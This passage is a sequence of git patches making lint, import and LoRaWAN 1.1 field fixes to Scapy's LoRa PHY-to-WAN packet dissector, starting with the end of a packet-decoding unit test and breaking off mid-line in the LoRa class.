+ +# LoRa PHY to WAN + +############ +############ ++ Basic tests + +* Those test are here mainly to check nothing has been broken + += Packet decoding +~ field + +p = b'\x00\x00\x00\x00lovecafemeeetoo\x00iiS\x02LI' +pkt = LoRa(p) +assert pkt.Join_Request_Field[0].DevEUI == b'meeetoo\x00' +assert pkt.Join_Request_Field[0].DevNonce == 26985 From 985e8cb526d17b37ed02ce7c793f2eef19c99134 Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Sat, 22 Feb 2020 21:34:40 +0100 Subject: [PATCH 0034/1632] Fixes few mistakes --- scapy/contrib/loraphy2wan.py | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index 7eee9f7cadc..839f95fde18 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -171,11 +171,12 @@ class DutyCycleAns(Packet): fields_desc = [] -class DLsettings(Packet): - name = "DLsettings" - fields_desc = [BitField("RFU", 0, 1), - BitField("RX1DRoffset", 0, 3), - BitField("RX2DataRate", 0, 4)] +# old spec +#class DLsettings(Packet): +# name = "DLsettings" +# fields_desc = [BitField("RFU", 0, 1), +# BitField("RX1DRoffset", 0, 3), +# BitField("RX2DataRate", 0, 4)] class RXParamSetupReq(Packet): @@ -536,7 +537,7 @@ def FOptsShow(pkt): elif pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 1 and pkt.MType <= 0b101: return True return False - except: + except Exception: return False @@ -562,11 +563,11 @@ class FHDR(Packet): ConditionalField(PacketListField("FOpts_up", b"", MACCommand_up, length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), - lambda pkt:FOptsShow(pkt)), + FOptsShow), ConditionalField(PacketListField("FOpts_down", b"", MACCommand_down, length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), - lambda pkt:FOptsShow(pkt))] + FOptsShow)] FPorts = {0: "NwkSKey"} # anything else is AppSKey @@ -609,7 +610,7 @@ def extract_padding(self, p): def __init__(self, packet=""): # CFlist calculated with on rest packet len if len(packet) > 18: Join_Accept.dcflist = True - return super(Join_Accept, self).__init__(packet) + super(Join_Accept, self).__init__(packet) RejoinType = {0: "NetID+DevEUI", From f57eb658d2a22cb64bc2a509f951e36f28b8ec84 Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Sat, 22 Feb 2020 21:50:22 +0100 Subject: [PATCH 0035/1632] Fixing other code cov issues --- scapy/contrib/loraphy2wan.py | 34 ++++++++++++++++------------------ 1 file changed, 16 insertions(+), 18 deletions(-) diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index 839f95fde18..7f6e9ec36e3 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -171,12 +171,17 @@ class DutyCycleAns(Packet): fields_desc = [] -# old spec +# old specs #class DLsettings(Packet): # name = "DLsettings" # fields_desc = [BitField("RFU", 0, 1), # BitField("RX1DRoffset", 0, 3), # BitField("RX2DataRate", 0, 4)] +class DLsettings(Packet): + name = "DLsettings" + fields_desc = [BitField("OptNeg", 0, 1), + XBitField("RX1DRoffset", 0, 3), + XBitField("RX2_Data_rate", 0, 4)] class RXParamSetupReq(Packet): @@ -322,7 +327,7 @@ class DevLoraWANversion(Packet): class RekeyInd(Packet): name = "RekeyInd" fields_desc = [PacketListField("LoRaWANversion", b"", - DevLoraWANversion, length_from=lambda pkt:1)] + DevLoraWANversion, length_from=lambda pkt:1)] class RekeyConf(Packet): @@ -517,13 +522,13 @@ def extract_padding(self, p): class FOpts(Packet): name = "FOpts" fields_desc = [ConditionalField(PacketListField("FOpts_up", b"", - MACCommand_up, # piggybacked MAC Command for uplink + MACCommand_up,# piggybacked MAC Command for uplink length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), lambda pkt:(pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 0 and pkt.MType >= 0b010)), ConditionalField(PacketListField("FOpts_down", b"", - MACCommand_down, # piggybacked MAC Command for downlink + MACCommand_down,# piggybacked MAC Command for downlink length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), lambda pkt:(pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 1 @@ -534,8 +539,8 @@ def FOptsShow(pkt): try: if pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 0 and pkt.MType >= 0b010: return True - elif pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 1 and pkt.MType <= 0b101: - return True + elif pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 1 and pkt.MType <= 0b101: + return True return False except Exception: return False @@ -552,7 +557,7 @@ class FHDR(Packet): length_from=lambda pkt:1), lambda pkt:(pkt.MType & 0b1 == 1 and pkt.MType <= 0b101)), - ConditionalField(PacketListField("FCtrl", b"", + ConditionalField(PacketListField("FCtrl", b"", FCtrl_UpLink, length_from=lambda pkt:1), lambda pkt:(pkt.MType & 0b1 == 0 @@ -564,8 +569,8 @@ class FHDR(Packet): MACCommand_up, length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), FOptsShow), - ConditionalField(PacketListField("FOpts_down", b"", - MACCommand_down, + ConditionalField(PacketListField("FOpts_down", b"", + MACCommand_down, length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), FOptsShow)] @@ -586,13 +591,6 @@ class Join_Request(Packet): LEShortField("DevNonce", 0x0000)] -class DLsettings(Packet): - name = "DLsettings" - fields_desc = [BitField("OptNeg", 0, 1), - XBitField("RX1DRoffset", 0, 3), - XBitField("RX2_Data_rate", 0, 4)] - - class Join_Accept(Packet): name = "Join_Accept" dcflist = False @@ -641,7 +639,7 @@ class FRMPayload(Packet): ConditionalField(PacketListField("Join_Accept_Field", b"", Join_Accept, count_from=lambda pkt:1), - lambda pkt:(pkt.MType == 0b001 + lambda pkt:(pkt.MType == 0b001 and LoRa.encrypted is False)), ConditionalField(StrField("Join_Accept_Encrypted", 0), lambda pkt:(pkt.MType == 0b001 and LoRa.encrypted is True))] @@ -653,7 +651,7 @@ class MACPayload(Packet): ConditionalField(ByteEnumField("FPort", 0, FPorts), lambda pkt:(pkt.MType >= 0b010 and pkt.MType <= 0b101)), FRMPayload] - + MTypes = {0b000: "Join-request", 0b001: "Join-accept", From 61a787f4cba863e58035719b17eaabee6a0f3f3f Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Sat, 22 Feb 2020 22:12:39 +0100 Subject: [PATCH 0036/1632] Adding ReJoin request ref type --- scapy/contrib/loraphy2wan.py | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index 7f6e9ec36e3..6c5d8f8464e 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -602,14 +602,13 @@ class Join_Accept(Packet): ConditionalField(StrFixedLenField("CFList", b"\x00" * 16 , 16), lambda pkt:(Join_Accept.dcflist is True))] - def extract_padding(self, p): - return "", p - def __init__(self, packet=""): # CFlist calculated with on rest packet len if len(packet) > 18: Join_Accept.dcflist = True super(Join_Accept, self).__init__(packet) + def extract_padding(self, p): + return "", p RejoinType = {0: "NetID+DevEUI", 1: "JoinEUI+DevEUI", @@ -642,7 +641,11 @@ class FRMPayload(Packet): lambda pkt:(pkt.MType == 0b001 and LoRa.encrypted is False)), ConditionalField(StrField("Join_Accept_Encrypted", 0), - lambda pkt:(pkt.MType == 0b001 and LoRa.encrypted is True))] + lambda pkt:(pkt.MType == 0b001 and LoRa.encrypted is True)), + ConditionalField(PacketListField("ReJoin_Request_Field", b"", + RejoinReq, + length_from=lambda pkt:14), + lambda pkt:(pkt.MType == 0b111))] class MACPayload(Packet): @@ -651,7 +654,7 @@ class MACPayload(Packet): ConditionalField(ByteEnumField("FPort", 0, FPorts), lambda pkt:(pkt.MType >= 0b010 and pkt.MType <= 0b101)), FRMPayload] - + MTypes = {0b000: "Join-request", 0b001: "Join-accept", From ccd8619683877800003badf34de1dcfe672eb144 Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Sat, 22 Feb 2020 22:19:45 +0100 Subject: [PATCH 0037/1632] Fixing class error --- scapy/contrib/loraphy2wan.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index 6c5d8f8464e..3ffa3a9a648 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -615,7 +615,7 @@ def extract_padding(self, p): 2: "NetID+DevEUI"} -def RejoinReq(Packet): # LoRa 1.1 specs +class RejoinReq(Packet): # LoRa 1.1 specs name = "RejoinReq" fields_desc = [ByteField("Type", 0), X3BytesField("NetID", 0), From b84624dab32f036eab14d690e800840f79131da9 Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Sat, 22 Feb 2020 22:28:07 +0100 Subject: [PATCH 0038/1632] Removing non-used method --- scapy/contrib/loraphy2wan.py | 2 -- 1 file changed, 2 deletions(-) diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index 3ffa3a9a648..3b23e48fb72 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -607,8 +607,6 @@ def __init__(self, packet=""): # CFlist calculated with on rest packet len Join_Accept.dcflist = True super(Join_Accept, self).__init__(packet) - def extract_padding(self, p): - return "", p RejoinType = {0: "NetID+DevEUI", 1: "JoinEUI+DevEUI", From a43edfb43f9bcec1fe8ec1025b4a74f31ba411a2 Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Sat, 22 Feb 2020 22:40:25 +0100 Subject: [PATCH 0039/1632] Non used method fix --- scapy/contrib/loraphy2wan.py | 3 --- 1 file changed, 3 deletions(-) diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index 3b23e48fb72..aa1190b0928 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -515,9 +515,6 @@ class MACCommand_down(Packet): length_from=lambda pkt:1), lambda pkt:(pkt.CID == 0x0F))] - def extract_padding(self, p): - return "", p - class FOpts(Packet): name = "FOpts" From 1b21e905f4d2a2ec42fe2615f08b7ab84bf919c2 Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Sat, 22 Feb 2020 22:48:33 +0100 Subject: [PATCH 0040/1632] Another standards fix --- scapy/contrib/loraphy2wan.py | 3 --- 1 file changed, 3 deletions(-) diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index aa1190b0928..837a8d0d368 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -451,9 +451,6 @@ class MACCommand_up(Packet): length_from=lambda pkt:1), lambda pkt:(pkt.CID == 0x0F))] - def extract_padding(self, p): - return "", p - class MACCommand_down(Packet): name = "MACCommand_down" From 0a8e201e342971d7c1d0e04fbdc267571d55671a Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Sat, 22 Feb 2020 22:58:47 +0100 Subject: [PATCH 0041/1632] Fixing error --- scapy/contrib/loraphy2wan.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index 837a8d0d368..bff5cca1969 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -66,8 +66,9 @@ class DevAddrElem(Packet): fields_desc = [XByteField("NwkID", 0x0), LEX3BytesField("NwkAddr", b"\x00"*3)] + def extract_padding(self, p): - return "", p + return b"", p CIDs_up = {0x01: "ResetInd", From 498e5a9201206999d9bcb6d064213d047e8f10c2 Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Sat, 22 Feb 2020 23:15:39 +0100 Subject: [PATCH 0042/1632] Fixing R0201 error --- scapy/contrib/loraphy2wan.py | 4 ---- 1 file changed, 4 deletions(-) diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index bff5cca1969..9cb99a7ee70 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -67,10 +67,6 @@ class DevAddrElem(Packet): LEX3BytesField("NwkAddr", b"\x00"*3)] - def extract_padding(self, p): - return b"", p - - CIDs_up = {0x01: "ResetInd", 0x02: "LinkCheckReq", 0x03: "LinkADRReq", From 9cd62d1ba0d2d004fa6c0192a7cbbddbbaef6e2a Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Sat, 22 Feb 2020 23:30:42 +0100 Subject: [PATCH 0043/1632] Fixing other R0201 issues --- scapy/contrib/loraphy2wan.py | 6 ------ 1 file changed, 6 deletions(-) diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index 9cb99a7ee70..0de189c0e4b 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -45,9 +45,6 @@ class FCtrl_DownLink(Packet): BitField("FPending", 0, 1), BitFieldLenField("FOptsLen", 0, 4)] - def extract_padding(self, p): - return "", p - class FCtrl_UpLink(Packet): name = "FCtrl_UpLink" @@ -57,9 +54,6 @@ class FCtrl_UpLink(Packet): BitField("ClassB", 0, 1), BitFieldLenField("FOptsLen", 0, 4)] - def extract_padding(self, p): - return "", p - class DevAddrElem(Packet): name = "DevAddrElem" From 317d777c096fba147a0834d1b79b605457e92ffb Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Tue, 25 Feb 2020 14:43:50 +0100 Subject: [PATCH 0044/1632] Fixing missing imports --- scapy/contrib/loraphy2wan.py | 36 +++++++++++++++++++++++------------- 1 file changed, 23 insertions(+), 13 deletions(-) diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index 0de189c0e4b..a8d288ed362 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -26,7 +26,8 @@ ConditionalField, EnumField, FieldLenField, IntField, LEIntField, \ LELongField, LEShortField, MACField, PacketListField, ShortField, \ StrFixedLenField, StrLenField, X3BytesField, XByteField, XIntField, \ - XLongField, XShortField, LEShortEnumField + XLongField, XShortField, LEShortEnumField, BitFieldLenField, \ + LEX3BytesField, XBitField, BitEnumField, XLEIntField, StrField ############################################################################### # Followed Specifications # @@ -45,6 +46,9 @@ class FCtrl_DownLink(Packet): BitField("FPending", 0, 1), BitFieldLenField("FOptsLen", 0, 4)] + def extract_padding(self, p): + return "", p + class FCtrl_UpLink(Packet): name = "FCtrl_UpLink" @@ -54,6 +58,8 @@ class FCtrl_UpLink(Packet): BitField("ClassB", 0, 1), BitFieldLenField("FOptsLen", 0, 4)] + def extract_padding(self, p): + return "", p class DevAddrElem(Packet): name = "DevAddrElem" @@ -69,13 +75,13 @@ class DevAddrElem(Packet): 0x06: "DevStatusReq", 0x07: "NewChannelReq", 0x08: "RXTimingSetupReq", - 0x09: "TxParamSetupReq", # LoRa 1.1 specs from here + 0x09: "TxParamSetupReq", # LoRa 1.1 specs 0x0A: "DlChannelReq", 0x0B: "RekeyInd", 0x0C: "ADRParamSetupReq", 0x0D: "DeviceTimeReq", 0x0E: "ForceRejoinReq", - 0x0F: "RejoinParamSetupReq"} # end of LoRa 1.1 specs + 0x0F: "RejoinParamSetupReq"} # end of LoRa 1.1 specs CIDs_down = {0x01: "ResetConf", @@ -86,12 +92,12 @@ class DevAddrElem(Packet): 0x06: "DevStatusAns", 0x07: "NewChannelAns", 0x08: "RXTimingSetupAns", - 0x09: "TxParamSetupAns", # LoRa 1.1 specs from here + 0x09: "TxParamSetupAns", # LoRa 1.1 specs here 0x0A: "DlChannelAns", 0x0B: "RekeyConf", 0x0C: "ADRParamSetupAns", 0x0D: "DeviceTimeAns", - 0x0F: "RejoinParamSetupAns"} # end of LoRa 1.1 specs + 0x0F: "RejoinParamSetupAns"} # end of LoRa 1.1 specs class ResetInd(Packet): @@ -255,8 +261,7 @@ class RXTimingSetupAns(Packet): fields_desc = [] -# Specific commands for LoRa 1.1 here - +# Specific commands for LoRa 1.1 here MaxEIRPs = {0: "8 dbm", 1: "10 dbm", @@ -442,6 +447,9 @@ class MACCommand_up(Packet): length_from=lambda pkt:1), lambda pkt:(pkt.CID == 0x0F))] + def extract_padding(self, p): + return "", p + class MACCommand_down(Packet): name = "MACCommand_down" @@ -587,18 +595,20 @@ class Join_Accept(Packet): ConditionalField(StrFixedLenField("CFList", b"\x00" * 16 , 16), lambda pkt:(Join_Accept.dcflist is True))] - def __init__(self, packet=""): # CFlist calculated with on rest packet len + def __init__(self, packet=""): # CFList calculated with rest of packet len if len(packet) > 18: Join_Accept.dcflist = True super(Join_Accept, self).__init__(packet) + def extract_padding(self, p): + return "", p RejoinType = {0: "NetID+DevEUI", 1: "JoinEUI+DevEUI", 2: "NetID+DevEUI"} -class RejoinReq(Packet): # LoRa 1.1 specs +class RejoinReq(Packet): # LoRa 1.1 specs name = "RejoinReq" fields_desc = [ByteField("Type", 0), X3BytesField("NetID", 0), @@ -608,10 +618,10 @@ class RejoinReq(Packet): # LoRa 1.1 specs class FRMPayload(Packet): name = "FRMPayload" - fields_desc = [ConditionalField(StrField("DataPayload", 0, remain=4), # Downlink + fields_desc = [ConditionalField(StrField("DataPayload", 0, remain=4), # Downlink lambda pkt:(pkt.MType == 0b101 or pkt.MType == 0b011)), - ConditionalField(StrField("DataPayload", 0, remain=6), # Uplink + ConditionalField(StrField("DataPayload", 0, remain=6), # Uplink lambda pkt:(pkt.MType == 0b100 or pkt.MType == 0b010)), ConditionalField(PacketListField("Join_Request_Field", b"", @@ -649,7 +659,7 @@ class MACPayload(Packet): 0b111: "Proprietary"} -class MHDR(Packet): # same for 1.0 and 1.1 +class MHDR(Packet): # Same for 1.0 as for 1.1 name = "MHDR" fields_desc = [BitEnumField("MType", 0b000, 3, MTypes), BitField("RFU", 0b000, 3), @@ -667,7 +677,7 @@ class PHYPayload(Packet): class LoRa(Packet): # default frame (unclear specs => taken from https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5677147/) name = "LoRa" - version = "1.1" # default version to parse + version = "1.1" # default version to parse encrypted = True fields_desc = [XBitField("Preamble", 0, 4), XBitField("PHDR", 0, 16), From 573b83e0e851093ceced0eb0f19527ba7b607669 Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Tue, 25 Feb 2020 14:56:42 +0100 Subject: [PATCH 0045/1632] Ignoring R0201 errors for paddings --- scapy/contrib/loraphy2wan.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index a8d288ed362..da141aec1f6 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -46,6 +46,7 @@ class FCtrl_DownLink(Packet): BitField("FPending", 0, 1), BitFieldLenField("FOptsLen", 0, 4)] + # pylint: disable=R0201 def extract_padding(self, p): return "", p @@ -58,6 +59,7 @@ class FCtrl_UpLink(Packet): BitField("ClassB", 0, 1), BitFieldLenField("FOptsLen", 0, 4)] + # pylint: disable=R0201 def extract_padding(self, p): return "", p @@ -447,6 +449,7 @@ class MACCommand_up(Packet): length_from=lambda pkt:1), lambda pkt:(pkt.CID == 0x0F))] + # pylint: disable=R0201 def extract_padding(self, p): return "", p @@ -600,6 +603,7 @@ def __init__(self, packet=""): # CFList calculated with rest of packet len Join_Accept.dcflist = True super(Join_Accept, self).__init__(packet) + # pylint: disable=R0201 def extract_padding(self, p): return "", p From a1d1373d954a6012fd94b043a84adf7b78e4d4bb Mon Sep 17 00:00:00 2001 From: FlUxIuS Date: Wed, 26 Feb 2020 17:47:31 +0100 Subject: [PATCH 0046/1632] Fixing some Travis errors --- scapy/contrib/loraphy2wan.py | 95 ++++++++++++++++-------------------- 1 file changed, 41 insertions(+), 54 deletions(-) diff --git a/scapy/contrib/loraphy2wan.py b/scapy/contrib/loraphy2wan.py index da141aec1f6..6c8ba8efbac 100644 --- a/scapy/contrib/loraphy2wan.py +++ b/scapy/contrib/loraphy2wan.py @@ -23,20 +23,11 @@ from __future__ import absolute_import from scapy.fields import BitField, ByteEnumField, ByteField, \ - ConditionalField, EnumField, FieldLenField, IntField, LEIntField, \ - LELongField, LEShortField, MACField, PacketListField, ShortField, \ - StrFixedLenField, StrLenField, X3BytesField, XByteField, XIntField, \ - XLongField, XShortField, LEShortEnumField, BitFieldLenField, \ - LEX3BytesField, XBitField, BitEnumField, XLEIntField, StrField - -############################################################################### -# Followed Specifications # -############################################################################### -# LoRa 1.0.x: https://lora-alliance.org/sites/default/files/2018-07/ # -#lorawan1.0.3.pdf # -# LoRa 1.1.x: https://lora-alliance.org/sites/default/files/2018-04/ # -#lorawantm_specification_-v1.1.pdf # -############################################################################### + ConditionalField, IntField, LEShortField, PacketListField, \ + StrFixedLenField, X3BytesField, XByteField, XIntField, \ + XShortField, BitFieldLenField, LEX3BytesField, XBitField, \ + BitEnumField, XLEIntField, StrField, Packet + class FCtrl_DownLink(Packet): name = "FCtrl_DownLink" @@ -63,10 +54,11 @@ class FCtrl_UpLink(Packet): def extract_padding(self, p): return "", p + class DevAddrElem(Packet): name = "DevAddrElem" fields_desc = [XByteField("NwkID", 0x0), - LEX3BytesField("NwkAddr", b"\x00"*3)] + LEX3BytesField("NwkAddr", b"\x00" * 3)] CIDs_up = {0x01: "ResetInd", @@ -77,13 +69,13 @@ class DevAddrElem(Packet): 0x06: "DevStatusReq", 0x07: "NewChannelReq", 0x08: "RXTimingSetupReq", - 0x09: "TxParamSetupReq", # LoRa 1.1 specs + 0x09: "TxParamSetupReq", # LoRa 1.1 specs 0x0A: "DlChannelReq", 0x0B: "RekeyInd", 0x0C: "ADRParamSetupReq", 0x0D: "DeviceTimeReq", 0x0E: "ForceRejoinReq", - 0x0F: "RejoinParamSetupReq"} # end of LoRa 1.1 specs + 0x0F: "RejoinParamSetupReq"} # end of LoRa 1.1 specs CIDs_down = {0x01: "ResetConf", @@ -94,12 +86,12 @@ class DevAddrElem(Packet): 0x06: "DevStatusAns", 0x07: "NewChannelAns", 0x08: "RXTimingSetupAns", - 0x09: "TxParamSetupAns", # LoRa 1.1 specs here + 0x09: "TxParamSetupAns", # LoRa 1.1 specs here 0x0A: "DlChannelAns", 0x0B: "RekeyConf", 0x0C: "ADRParamSetupAns", 0x0D: "DeviceTimeAns", - 0x0F: "RejoinParamSetupAns"} # end of LoRa 1.1 specs + 0x0F: "RejoinParamSetupAns"} # end of LoRa 1.1 specs class ResetInd(Packet): @@ -170,12 +162,6 @@ class DutyCycleAns(Packet): fields_desc = [] -# old specs -#class DLsettings(Packet): -# name = "DLsettings" -# fields_desc = [BitField("RFU", 0, 1), -# BitField("RX1DRoffset", 0, 3), -# BitField("RX2DataRate", 0, 4)] class DLsettings(Packet): name = "DLsettings" fields_desc = [BitField("OptNeg", 0, 1), @@ -201,6 +187,7 @@ class RXParamSetupAns(Packet): name = "RXParamSetupAns" fields_desc = [RXParamSetupAns_Status] + Battery_state = {0: "End-device connected to external source", 255: "Battery level unknown"} @@ -325,7 +312,7 @@ class DevLoraWANversion(Packet): class RekeyInd(Packet): name = "RekeyInd" fields_desc = [PacketListField("LoRaWANversion", b"", - DevLoraWANversion, length_from=lambda pkt:1)] + DevLoraWANversion, length_from=lambda pkt:1)] class RekeyConf(Packet): @@ -420,7 +407,7 @@ class MACCommand_up(Packet): RXTimingSetupReq, length_from=lambda pkt:1), lambda pkt:(pkt.CID == 0x08)), - ConditionalField(PacketListField("TxParamSetup", b"", # specific to 1.1 from here + ConditionalField(PacketListField("TxParamSetup", b"", # specific to 1.1 from here TxParamSetupReq, length_from=lambda pkt:1), lambda pkt:(pkt.CID == 0x09)), @@ -518,14 +505,14 @@ class MACCommand_down(Packet): class FOpts(Packet): name = "FOpts" fields_desc = [ConditionalField(PacketListField("FOpts_up", b"", - MACCommand_up,# piggybacked MAC Command for uplink - length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), + MACCommand_up, # piggybacked MAC Command for uplink # noqa: E501 + length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), # noqa: E501 lambda pkt:(pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 0 and pkt.MType >= 0b010)), ConditionalField(PacketListField("FOpts_down", b"", - MACCommand_down,# piggybacked MAC Command for downlink - length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), + MACCommand_down, # piggybacked MAC Command for downlink # noqa: E501 + length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), # noqa: E501 lambda pkt:(pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 1 and pkt.MType <= 0b101))] @@ -533,9 +520,9 @@ class FOpts(Packet): def FOptsShow(pkt): try: - if pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 0 and pkt.MType >= 0b010: + if pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 0 and pkt.MType >= 0b010: # noqa: E501 return True - elif pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 1 and pkt.MType <= 0b101: + elif pkt.FCtrl[0].FOptsLen > 0 and pkt.MType & 0b1 == 1 and pkt.MType <= 0b101: # noqa: E501 return True return False except Exception: @@ -544,7 +531,7 @@ def FOptsShow(pkt): class FHDR(Packet): name = "FHDR" - fields_desc = [ConditionalField(PacketListField("DevAddr", b"", DevAddrElem, + fields_desc = [ConditionalField(PacketListField("DevAddr", b"", DevAddrElem, # noqa: E501 length_from=lambda pkt:4), lambda pkt:(pkt.MType >= 0b010 and pkt.MType <= 0b101)), @@ -563,15 +550,15 @@ class FHDR(Packet): and pkt.MType <= 0b101)), ConditionalField(PacketListField("FOpts_up", b"", MACCommand_up, - length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), + length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), # noqa: E501 FOptsShow), ConditionalField(PacketListField("FOpts_down", b"", MACCommand_down, - length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), + length_from=lambda pkt:pkt.FCtrl[0].FOptsLen), # noqa: E501 FOptsShow)] -FPorts = {0: "NwkSKey"} # anything else is AppSKey +FPorts = {0: "NwkSKey"} # anything else is AppSKey JoinReqTypes = {0xFF: "Join-request", @@ -591,14 +578,14 @@ class Join_Accept(Packet): name = "Join_Accept" dcflist = False fields_desc = [LEX3BytesField("JoinAppNonce", 0), - LEX3BytesField("NetID", 0), - XLEIntField("DevAddr", 0), - DLsettings, - XByteField("RxDelay", 0), - ConditionalField(StrFixedLenField("CFList", b"\x00" * 16 , 16), - lambda pkt:(Join_Accept.dcflist is True))] - - def __init__(self, packet=""): # CFList calculated with rest of packet len + LEX3BytesField("NetID", 0), + XLEIntField("DevAddr", 0), + DLsettings, + XByteField("RxDelay", 0), + ConditionalField(StrFixedLenField("CFList", b"\x00" * 16 , 16), # noqa: E501 + lambda pkt:(Join_Accept.dcflist is True))] + + def __init__(self, packet=""): # CFList calculated with rest of packet len if len(packet) > 18: Join_Accept.dcflist = True super(Join_Accept, self).__init__(packet) @@ -612,7 +599,7 @@ def extract_padding(self, p): 2: "NetID+DevEUI"} -class RejoinReq(Packet): # LoRa 1.1 specs +class RejoinReq(Packet): # LoRa 1.1 specs name = "RejoinReq" fields_desc = [ByteField("Type", 0), X3BytesField("NetID", 0), @@ -622,10 +609,10 @@ class RejoinReq(Packet): # LoRa 1.1 specs class FRMPayload(Packet): name = "FRMPayload" - fields_desc = [ConditionalField(StrField("DataPayload", 0, remain=4), # Downlink + fields_desc = [ConditionalField(StrField("DataPayload", 0, remain=4), # Downlink # noqa: E501 lambda pkt:(pkt.MType == 0b101 or pkt.MType == 0b011)), - ConditionalField(StrField("DataPayload", 0, remain=6), # Uplink + ConditionalField(StrField("DataPayload", 0, remain=6), # Uplink # noqa: E501 lambda pkt:(pkt.MType == 0b100 or pkt.MType == 0b010)), ConditionalField(PacketListField("Join_Request_Field", b"", @@ -638,7 +625,7 @@ class FRMPayload(Packet): lambda pkt:(pkt.MType == 0b001 and LoRa.encrypted is False)), ConditionalField(StrField("Join_Accept_Encrypted", 0), - lambda pkt:(pkt.MType == 0b001 and LoRa.encrypted is True)), + lambda pkt:(pkt.MType == 0b001 and LoRa.encrypted is True)), # noqa: E501 ConditionalField(PacketListField("ReJoin_Request_Field", b"", RejoinReq, length_from=lambda pkt:14), @@ -649,7 +636,7 @@ class MACPayload(Packet): name = "MACPayload" fields_desc = [FHDR, ConditionalField(ByteEnumField("FPort", 0, FPorts), - lambda pkt:(pkt.MType >= 0b010 and pkt.MType <= 0b101)), + lambda pkt:(pkt.MType >= 0b010 and pkt.MType <= 0b101)), # noqa: E501 FRMPayload] @@ -659,11 +646,11 @@ class MACPayload(Packet): 0b011: "Unconfirmed Data Down", 0b100: "Confirmed Data Up", 0b101: "Confirmed Data Down", - 0b110: "Rejoin-request", # Only in LoRa 1.1 specs + 0b110: "Rejoin-request", # Only in LoRa 1.1 specs 0b111: "Proprietary"} -class MHDR(Packet): # Same for 1.0 as for 1.1 +class MHDR(Packet): # Same for 1.0 as for 1.1 name = "MHDR" fields_desc = [BitEnumField("MType", 0b000, 3, MTypes), BitField("RFU", 0b000, 3), @@ -679,9 +666,9 @@ class PHYPayload(Packet): or LoRa.encrypted is False))] -class LoRa(Packet): # default frame (unclear specs => taken from https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5677147/) +class LoRa(Packet): # default frame (unclear specs => taken from https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5677147/) # noqa: E501 name = "LoRa" - version = "1.1" 